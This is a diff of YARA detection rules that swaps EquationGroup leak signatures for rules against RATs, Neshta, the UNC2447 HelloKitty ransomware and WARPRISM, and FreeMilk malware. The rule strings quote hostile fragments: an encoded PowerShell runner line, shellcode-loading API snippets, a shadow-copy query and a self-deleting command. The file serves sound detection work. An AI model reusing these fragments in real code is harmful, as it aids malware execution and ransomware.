+		$a5 = "www.bitcoin.org" fullword ascii
+		$a6 = "web.whatsapp.com" fullword ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 2000KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 500KB and ( 1 of ( $x* ) or 2 of ( $s* ) or 4 of ( $a* ) )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_PC_LP : FILE
+rule SIGNATURE_BASE_Unauthorized_Proxy_Server_RAT
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "c3f8f0f9-80ab-5d8e-be42-59b90dc291cb"
-		date = "2017-04-15"
+		description = "Detects Proxy Server RAT"
+		author = "US-CERT Code Analysis Team"
+		id = "378573e3-17a7-5862-aae5-a8e84102e237"
+		date = "2017-12-26"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2494-L2508"
+		reference = "https://www.us-cert.gov/HIDDEN-COBRA-North-Korean-Malicious-Cyber-Activity"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_hiddencobra_bankshot.yar#L67-L92"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "cd7b92f13e0a00d23baef70e38b476b62394106dfa70e831786f398c573aa744"
+		logic_hash = "7ede26272ddcb25dca2b44ff08b232f358078872f6cf76491b0fd8d65772c60d"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "3a505c39acd48a258f4ab7902629e5e2efa8a2120a4148511fe3256c37967296"
+		tags = ""
+		hash1 = "C74E289AD927E81D2A1A56BC73E394AB"
+		hash2 = "2950E3741D7AF69E0CA0C5013ABC4209"
 
 	strings:
-		$s1 = "* Failed to get connection information.  Aborting launcher!" fullword wide
-		$s2 = "Format: <command> <target port> [lp port]" fullword wide
+		$s0 = {8A043132C288043125FF00000003C299F73D40404900A14440490003D0413BCF72DE5E5FC3}
+		$s1 = {8A04318844241432C28804318B44241425FF00000003C299F73D40404900A14440490003D0413BCF72D65E5FC3}
+		$s2 = {8A04318844241432C28804318B44241425FF00000003C299F73D5C394100A16039410003D0413BCF72D65E5FC3}
+		$s3 = {8A043132C288043125FF00000003C299F73D5C394100A16039410003D0413BCF72DE5E5FC3}
+		$s4 = {B91A7900008A140780F29A8810404975F4}
+		$s5 = {399FE192769F839DCE9F2A9D2C9EAD9CEB9FD19CA59F7E9F539CEF9F029F969C6C9E5C9D949FC99F}
+		$s6 = {8A04318844241432C28804318B44241425FF00000003C299F73D40600910A14460091003D0413BCF72D65E5FC3}
+		$s7 = {3C5C75208A41014184C074183C72740C3C7474083C6274043C2275088A41014184C075DC}
+		$s8 = {8B063D9534120077353D59341200722E668B4604663DE8037F24}
+		$s9 = {8BC88B74241CC1E1052BC88B7C2418C1E1048B5C241403C88D04888B4C242083F9018944240C7523}
+		$s10 = {8B063D9034120077353D59341200722E668B4604663DE8037F246685C0}
+		$s11 = {30110FB60148FFC102C20FBEC09941F7F94103D249FFC875E7}
+		$s12 = {448BE8B84FECC44E41F7EDC1FA038BCAC1E91F03D16BD21A442BEA4183C541}
+		$s13 = {8A0A80F9627C2380F9797F1E80F9647C0A80F96D7F0580C10BEB0D80F96F7C0A80F9787F05}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+		any of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Remotecommand_Lp : FILE
+rule SIGNATURE_BASE_MAL_Wshrat_Dotnet_Packer_Feb21 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
-		author = "Florian Roth (Nextron Systems)"
-		id = "98ace4d7-edd0-5e84-bac8-b69e5307f567"
-		date = "2017-04-15"
+		description = "Yara Rule for WSH rat .NET packer of February 2021 "
+		author = "Yoroi Malware ZLab"
+		id = "62e043fc-7d13-5b91-9fdd-e71d91194da2"
+		date = "2021-03-09"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2510-L2524"
+		reference = "https://yoroi.company/research/threatening-within-budget-how-wsh-rat-is-abused-by-cyber-crooks/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/crime_wsh_rat.yar#L1-L17"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "974772264324e7721f51a88534aaa3b4eb1d409e04f673783caf4849d90522de"
+		logic_hash = "18159b140c314a00111fb9453e60d19c11633628a4fe2ad8299b839165b39424"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "57b47613a3b5dd820dae59fc6dc2b76656bd578f015f367675219eb842098846"
 
 	strings:
-		$s1 = "Failure parsing command from %hs:%u: os=%u plugin=%u" fullword wide
-		$s2 = "Unable to get TCP listen port: %08x" fullword wide
+		$a1 = { BE DD 60 8C 34 49 9A 54 D2 40 }
+		$a2 = { 1D D7 24 22 47 A6 B1 A5 }
+		$a3 = { 13 30 03 00 07 00 00 00 01 }
+		$a4 = { 11 02 03 7D 78 00 00 04 2A }
+		$a5 = { A8 8A F4 C8 61 2B CA 07 }
+		$a6 = { 15 AE 5E AB 5A 20 FE B5 56 B4 61 2B BB 06 2A}
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 200KB and all of them )
+		uint16( 0 ) == 0x5A4D and 3 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Lp_Mstcp : FILE
+
+rule SIGNATURE_BASE_MAL_Neshta_Generic : HIGHVOL FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Detects Neshta malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "afa4985e-7c8f-58fc-9881-219ccba6a495"
-		date = "2017-04-15"
-		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2526-L2545"
+		id = "9a3b8369-7e19-5c21-9eba-0bb81507696a"
+		date = "2018-01-15"
+		modified = "2021-04-14"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/mal_netsha.yar#L3-L36"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "5d1423661f95d955f411414138da45cc4be59b2e6bf8e70f471b8f41fc9ea3f4"
+		logic_hash = "acac6f81900c60a0aacea6345a7c03a0b77dd86d5ca7ca3d102668c49595bb6b"
 		score = 75
-		quality = 83
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2ab1e1d23021d887759750a0c053522e9149b7445f840936bbc7e703f8700abd"
+		quality = 85
+		tags = "HIGHVOL, FILE"
+		hash1 = "27c67eb1378c2fd054c6649f92ec8ee9bfcb6f790224036c974f6c883c46f586"
+		hash1 = "0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e"
+		hash2 = "b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb"
+		hash3 = "1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb"
 
 	strings:
-		$s1 = "\\Registry\\User\\CurrentUser\\" wide
-		$s2 = "_PacketNDISRequestComplete@12\"" fullword ascii
-		$s3 = "_LDNdis5RegDeleteKeys@4" ascii
-		$op1 = { 89 7e 04 75 06 66 21 46 02 eb }
-		$op2 = { fc 74 1b 8b 49 04 0f b7 d3 66 83 }
-		$op3 = { aa 0f b7 45 fc 8b 52 04 8d 4e }
+		$x1 = "the best. Fuck off all the rest."
+		$x2 = "! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]" fullword ascii
+		$s1 = "Neshta" ascii fullword
+		$s2 = "Made in Belarus. " ascii fullword
+		$op1 = { 85 c0 93 0f 85 62 ff ff ff 5e 5b 89 ec 5d c2 04 }
+		$op2 = { e8 e5 f1 ff ff 8b c3 e8 c6 ff ff ff 85 c0 75 0c }
+		$op3 = { eb 02 33 db 8b c3 5b c3 53 85 c0 74 15 ff 15 34 }
+		$sop1 = { e8 3c 2a ff ff b8 ff ff ff 7f eb 3e 83 7d 0c 00 }
+		$sop2 = { 2b c7 50 e8 a4 40 ff ff ff b6 88 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 100KB and ( all of ( $s* ) or all of ( $op* ) ) )
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( 1 of ( $x* ) or all of ( $s* ) or 3 of them or pe.imphash ( ) == "9f4693fc0c511135129493f2161d1e86" )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Renamer : FILE
+rule SIGNATURE_BASE_APT_UNC2447_MAL_SOMBRAT_May21_1 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Detects SombRAT samples from UNC2447 campaign"
 		author = "Florian Roth (Nextron Systems)"
-		id = "b5a7c8a8-c30d-5667-a458-6962a24061d3"
-		date = "2017-04-15"
-		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2547-L2561"
+		id = "78b46bed-4fd4-596f-bba7-12243f467af3"
+		date = "2021-05-01"
+		modified = "2023-01-07"
+		reference = "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_unc2447_sombrat.yar#L2-L36"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4941f31be6674499b202a3071d795317e6d97fb19088ea370180708e3d04bca7"
+		logic_hash = "6f2572745cbd68c5f2be5c64b160d2513938daba6da57523012491acc63cfee4"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9c30331cb00ae8f417569e9eb2c645ebbb36511d2d1531bb8d06b83781dfe3ac"
+		hash1 = "61e286c62e556ac79b01c17357176e58efb67d86c5d17407e128094c3151f7f9"
+		hash2 = "99baffcd7a6b939b72c99af7c1e88523a50053ab966a079d9bf268aff884426e"
 
 	strings:
-		$s1 = "FILE_NAME_CONVERSION.LOG" fullword wide
-		$s2 = "Log file exists. You must delete it!!!" fullword wide
+		$x1 = "~arungvc" ascii fullword
+		$s1 = "plugin64_" ascii
+		$s2 = "0xUnknown" ascii fullword
+		$s3 = "b%x.%s" ascii fullword
+		$s4 = "/news" ascii
+		$sc1 = { 00 73 00 65 00 72 00 76 00 69 00 63 00 65 00 73
+               00 2E 00 65 00 78 00 65 00 00 00 00 00 00 00 00
+               00 49 73 57 6F 77 36 34 50 72 6F 63 65 73 73 00
+               00 6B 00 65 00 72 00 6E 00 65 00 6C 00 33 00 32
+               00 00 00 00 00 00 00 00 00 47 00 6C 00 6F 00 62
+               00 61 00 6C 00 5C 00 25 00 73 }
+		$op1 = { 66 90 0f b6 45 80 32 44 0d 81 34 de 88 44 0d 81 48 ff c1 48 83 f9 19 72 e9 }
+		$op2 = { 48 8b d0 66 0f 6f 05 ?1 ?? 0? 00 f3 0f 7f 44 24 68 66 89 7c 24 58 41 b8 10 00 00 00 4c 39 40 10 4c 0f 42 40 10 48 83 78 18 08 }
+		$op3 = { 49 f7 b0 a0 00 00 00 42 0f b6 04 0a 41 30 44 33 fe 48 83 79 18 10 72 03 48 8b 09 33 d2 b8 05 00 00 00 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 80KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 3000KB and ( ( 1 of ( $x* ) and 1 of ( $s* ) ) or 3 of them ) or 5 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_PC_Exploit : FILE
+rule SIGNATURE_BASE_APT_UNC2447_MAL_RANSOM_Hellokitty_May21_1 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Detects HelloKitty Ransomware samples from UNC2447 campaign"
 		author = "Florian Roth (Nextron Systems)"
-		id = "67a4c8b8-87fb-5f2d-a4dd-299d087c77a3"
-		date = "2017-04-15"
+		id = "c84b2430-dcf1-5a80-96a0-02d292ea386b"
+		date = "2021-05-01"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2563-L2579"
+		reference = "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_unc2447_sombrat.yar#L38-L72"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "6f04ec5d1066b34ebee2504f7d229610e525743f7536d58bf99fc4f89ac6aa3b"
+		logic_hash = "acc0ab5502d53c6e22c8650c29c5459a6106f33c398e4efcd963f54971a0c870"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "77486bb828dba77099785feda0ca1d4f33ad0d39b672190079c508b3feb21fb0"
+		hash1 = "02a08b994265901a649f1bcf6772bc06df2eb51eb09906af9fd0f4a8103e9851"
+		hash2 = "0e5f7737704c8f25b2b8157561be54a463057cd4d79c7e016c30a1cf6590a85c"
+		hash3 = "52dace403e8f9b4f7ea20c0c3565fa11b6953b404a7d49d63af237a57b36fd2a"
+		hash4 = "7be901c5f7ffeb8f99e4f5813c259d0227335680380ed06df03fb836a041cb06"
+		hash5 = "947e357bfdfe411be6c97af6559fd1cdc5c9d6f5cea122bf174d124ee03d2de8"
+		hash6 = "9a7daafc56300bd94ceef23eac56a0735b63ec6b9a7a409fb5a9b63efe1aa0b0"
+		hash7 = "a147945635d5bd0fa832c9b55bc3ebcea7a7787e8f89b98a44279f8eddda2a77"
+		hash8 = "bade05a30aba181ffbe4325c1ba6c76ef9e02cbe41a4190bd3671152c51c4a7b"
+		hash9 = "c2498845ed4b287fd0f95528926c8ee620ef0cbb5b27865b2007d6379ffe4323"
+		hash10 = "dc007e71085297883ca68a919e37687427b7e6db0c24ca014c148f226d8dd98f"
+		hash11 = "ef614b456ca4eaa8156a895f450577600ad41bd553b4512ae6abf3fb8b5eb04e"
 
 	strings:
-		$s1 = "\\\\.\\pipe\\pcheap_reuse" fullword wide
-		$s2 = "**** FAILED TO DUPLICATE SOCKET ****" fullword wide
-		$s3 = "**** UNABLE TO DUPLICATE SOCKET TYPE %u ****" fullword wide
-		$s4 = "YOU CAN IGNORE ANY 'ServiceEntry returned error' messages after this..." fullword wide
+		$xop1 = { 8b 45 08 8b 75 f4 fe 85 f7 fd ff ff 0f 11 44 05 b4 83 c0 10 89 45 08 83 f8 30 7c 82 }
+		$xop2 = { 81 c3 dc a9 b0 5c c1 c9 0b 33 c8 89 55 a0 8b c7 8b 7d e0 c1 c8 06 33 f7 }
+		$s1 = "select * from Win32_ShadowCopy" wide fullword
+		$s2 = "bootfont.bin" wide fullword
+		$s3 = "DECRYPT_NOTE.txt" wide fullword
+		$s4 = ".onion" wide
+		$sop1 = { 8b f9 0f 57 c0 68 18 01 00 00 6a 00 0f 11 45 dc 8d 5f 20 53 0f 11 45 ec }
+		$sop2 = { 56 57 8b f9 0f 57 c0 68 18 01 00 00 6a 00 0f 11 45 dc 8d 5f 20 }
+		$sop3 = { 57 8b f9 0f 57 c0 68 18 01 00 00 6a 00 0f 11 45 dc 8d 5f 20 53 }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 20KB and 1 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 800KB and 1 of ( $x* ) or 3 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_PC_Level3_Gen : FILE
+rule SIGNATURE_BASE_APT_UNC2447_MAL_RANSOM_Hellokitty_May21_2 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Detects HelloKitty Ransomware samples from UNC2447 campaign"
 		author = "Florian Roth (Nextron Systems)"
-		id = "c479964c-3122-511d-9410-bc5d890f1489"
-		date = "2017-04-15"
+		id = "82aaabc6-102a-512e-8c2a-4d6fda864c68"
+		date = "2021-05-01"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2581-L2600"
+		reference = "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_unc2447_sombrat.yar#L74-L99"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "2ba0f5ada13bd8c71836f26e278c334fdbf2578eac189852befee7a81c07e169"
+		logic_hash = "1eee3a00ab3f70425d2b6bf5dc507155bf504b851ddb6515602d83d8b6a254b8"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "c7dd49b98f399072c2619758455e8b11c6ee4694bb46b2b423fa89f39b185a97"
-		hash2 = "f6b723ef985dfc23202870f56452581a08ecbce85daf8dc7db4491adaa4f6e8f"
+		hash1 = "10887d13dba1f83ef34e047455a04416d25a83079a7f3798ce3483e0526e3768"
+		hash2 = "3ae7bedf236d4e53a33f3a3e1e80eae2d93e91b1988da2f7fcb8fde5dcc3a0e9"
+		hash3 = "501487b025f25ddf1ca32deb57a2b4db43ccf6635c1edc74b9cff54ce0e5bcfe"
+		hash4 = "9a7daafc56300bd94ceef23eac56a0735b63ec6b9a7a409fb5a9b63efe1aa0b0"
 
 	strings:
-		$s1 = "S-%u-%u" fullword ascii
-		$s2 = "Copyright (C) Microsoft" fullword wide
-		$op1 = { 24 39 65 c6 44 24 3a 6c c6 44 24 3b 65 c6 44 24 }
-		$op2 = { 44 24 4e 41 88 5c 24 4f ff }
-		$op3 = { 44 24 3f 6e c6 44 24 40 45 c6 44 24 41 }
+		$xop1 = { 50 8d 45 f8 50 ff 75 fc ff 15 ?? ?? 42 00 3d ea 00 00 00 75 18 83 7d f8 00 }
+		$s1 = "HelloKittyMutex" wide
+		$s2 = "%s\\read_me_lkd.txt" wide fullword
+		$s3 = "/C ping 127.0.0.1 & del %s" wide fullword
+		$s4 = "(%d) [%d] %s: STOP DOUBLE PROCESS RUN" ascii fullword
+		$sop1 = { 6a 00 6a 01 ff 75 fc ff 15 ?? ?? 42 00 85 c0 0f 94 c3 ff 75 fc ff 15 ?? ?? 42 00 }
+		$sop2 = { 74 12 6a 00 6a 01 ff 75 fc ff 15 ?? ?? 42 00 85 c0 0f 94 c3 ff 75 fc }
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 400KB and 3 of them )
+		uint16( 0 ) == 0x5a4d and filesize < 600KB and 1 of ( $x* ) or 2 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Put_Implant9X : FILE
+rule SIGNATURE_BASE_APT_UNC2447_PS1_WARPRISM_May21_1 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Detects WARPRISM PowerShell samples from UNC2447 campaign"
 		author = "Florian Roth (Nextron Systems)"
-		id = "73cafd51-8b0d-59e3-966d-2f5de65953a7"
-		date = "2017-04-15"
+		id = "fa389a45-3b31-5a84-9882-49fd6ee8cac5"
+		date = "2021-05-01"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2602-L2618"
+		reference = "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_unc2447_sombrat.yar#L101-L119"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "e79a59e400aac544dc1160d5898e3053f88f7d5bc142440177526187650484e7"
+		logic_hash = "09abac2be0f12d31dabfdae9e8a148a28887a2a5df003c7bcb56ba45f1c6a62c"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8fcc98d63504bbacdeba0c1e8df82f7c4182febdf9b08c578d1195b72d7e3d5f"
+		hash1 = "3090bff3d16b0b150444c3bfb196229ba0ab0b6b826fa306803de0192beddb80"
+		hash2 = "63ba6db8c81c60dd9f1a0c7c4a4c51e2e56883f063509ed7b543ad7651fd8806"
+		hash3 = "b41a303a4caa71fa260dd601a796033d8bfebcaa6bd9dfd7ad956fac5229a735"
 
 	strings:
-		$s1 = "3&3.3<3A3F3K3V3c3m3" fullword ascii
-		$op1 = { c9 c2 08 00 b8 72 1c 00 68 e8 c9 fb ff ff 51 56 }
-		$op2 = { 40 1b c9 23 c8 03 c8 38 5d 14 74 05 6a 03 58 eb }
+		$x1 = "if ($MyInvocation.MyCommand.Path -match '\\S') {" ascii fullword
+		$s1 = "[DllImport(\"kernel32.dll\")]public static extern IntPtr VirtualAlloc(IntPtr " ascii wide
+		$s2 = "[Runtime.InteropServices.Marshal]::Copy($" ascii wide
+		$s3 = "[System.Diagnostics.Process]::Start((-join(" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 20KB and 2 of them )
+		filesize < 5000KB and 1 of ( $x* ) or 2 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Promiscdetect_Safe : FILE
+rule SIGNATURE_BASE_APT_UNC2447_BAT_Runner_May21_1 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Detects Batch script runners from UNC2447 campaign"
 		author = "Florian Roth (Nextron Systems)"
-		id = "d6103861-b332-5c21-8408-76b512012689"
-		date = "2017-04-15"
-		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2620-L2635"
+		id = "0bacd4f7-421a-570f-9f74-5a19ab806dd0"
+		date = "2021-05-01"
+		modified = "2023-01-07"
+		reference = "https://www.fireeye.com/blog/threat-research/2021/04/unc2447-sombrat-and-fivehands-ransomware-sophisticated-financial-threat.html"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_unc2447_sombrat.yar#L121-L135"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "4b8c2e9a00af4e6aed7f603dee0439357e3389180fbd2e83d6809e76dc7d0428"
+		logic_hash = "f9872327f648e4421aa40ca3ce55df5d3eb5e8c5bc718ff62a3d4adac79217eb"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "6070d8199061870387bb7796fb8ccccc4d6bafed6718cbc3a02a60c6dc1af847"
+		hash1 = "ccacf4658ae778d02e4e55cd161b5a0772eb8b8eee62fed34e2d8f11db2cc4bc"
 
 	strings:
-		$s1 = "running on this computer!" fullword ascii
-		$s2 = "- Promiscuous (capture all packets on the network)" fullword ascii
-		$s3 = "Active filter for the adapter:" fullword ascii
+		$x1 = "powershell.exe -c \"[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String([IO.File]::" ascii
+		$x2 = "wwansvc.txt')))\" | powershell.exe -" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 80KB and all of them )
+		filesize < 5000KB and 1 of them
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Packetscan_Implant : FILE
+
+rule SIGNATURE_BASE_Freemilk_APT_Mal_1 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Detects malware from FreeMilk campaign"
 		author = "Florian Roth (Nextron Systems)"
-		id = "e49695d9-15ae-53a6-955c-c68402e241a2"
-		date = "2017-04-15"
+		id = "eff37dba-d4a9-5e3d-9452-49f04ddcbe0b"
+		date = "2017-10-05"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2637-L2652"
+		reference = "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_freemilk.yar#L13-L39"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "aa2106d2aad3e81c864181c851574f76f48cd4fe48bb3327135f2956d271dfde"
+		logic_hash = "d66feceb01ecdd84345def58270a8788b563c99a7efadf9a3049c5fbbbd15da8"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9b97cac66d73a9d268a15e47f84b3968b1f7d3d6b68302775d27b99a56fbb75a"
+		hash1 = "34478d6692f8c28332751b31fd695b799d4ab36a8c12f7b728e2cb99ae2efcd9"
+		hash2 = "35273d6c25665a19ac14d469e1436223202be655ee19b5b247cb1afef626c9f2"
+		hash3 = "0f82ea2f92c7e906ee9ffbbd8212be6a8545b9bb0200eda09cce0ba9d7cb1313"
 
 	strings:
-		$op0 = { e9 ef fe ff ff ff b5 c0 ef ff ff 8d 85 c8 ef ff }
-		$op1 = { c9 c2 04 00 b8 34 26 00 68 e8 40 05 00 00 51 56 }
-		$op2 = { e9 0b ff ff ff 8b 45 10 8d 4d c0 89 58 08 c6 45 }
+		$x1 = "\\milk\\Release\\milk.pdb" ascii
+		$x2 = "E:\\BIG_POOH\\Project\\" ascii
+		$x3 = "Windows-KB271854-x86.exe" fullword wide
+		$s1 = "Windows-KB275122-x86.exe" fullword wide
+		$s2 = "\\wsatra.tmp" wide
+		$s3 = "%s\\Rar0tmpExtra%d.rtf" fullword wide
+		$s4 = "\"%s\" help" fullword wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 30KB and all of them )
+		uint16( 0 ) == 0x5a4d and filesize < 300KB and ( pe.imphash ( ) == "108aa007b3d1b4817ff4c04d9b254b39" or 1 of ( $x* ) or 4 of them )
 }
-rule SIGNATURE_BASE_Equationgroup_Toolset_Apr17_Setports : FILE
+
+rule SIGNATURE_BASE_Freemilk_APT_Mal_2 : FILE
 {
 	meta:
-		description = "Detects EquationGroup Tool - April Leak"
+		description = "Detects malware from FreeMilk campaign"
 		author = "Florian Roth (Nextron Systems)"
-		id = "6dc67951-714e-57d9-b34a-0006348b6b10"
-		date = "2017-04-15"
+		id = "ef5f400c-16f8-5374-af16-c8530ddb87ee"
+		date = "2017-10-05"
 		modified = "2023-12-05"
-		reference = "https://steemit.com/shadowbrokers/@theshadowbrokers/lost-in-translation"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_eqgrp_apr17.yar#L2654-L2668"
+		reference = "https://researchcenter.paloaltonetworks.com/2017/10/unit42-freemilk-highly-targeted-spear-phishing-campaign/"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/yara/apt_freemilk.yar#L41-L60"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/63ed72f6a9032086f706578a6688d3072787612c/LICENSE"
-		logic_hash = "b2c61f6ca2d59d5e596e7c5c87ed3476d957763daeaf41e6f356bacf26415faf"
+		logic_hash = "ad2cc04542e93add3e7856574d4de5aa371cc31542f87b1e90d30e12e0149341"
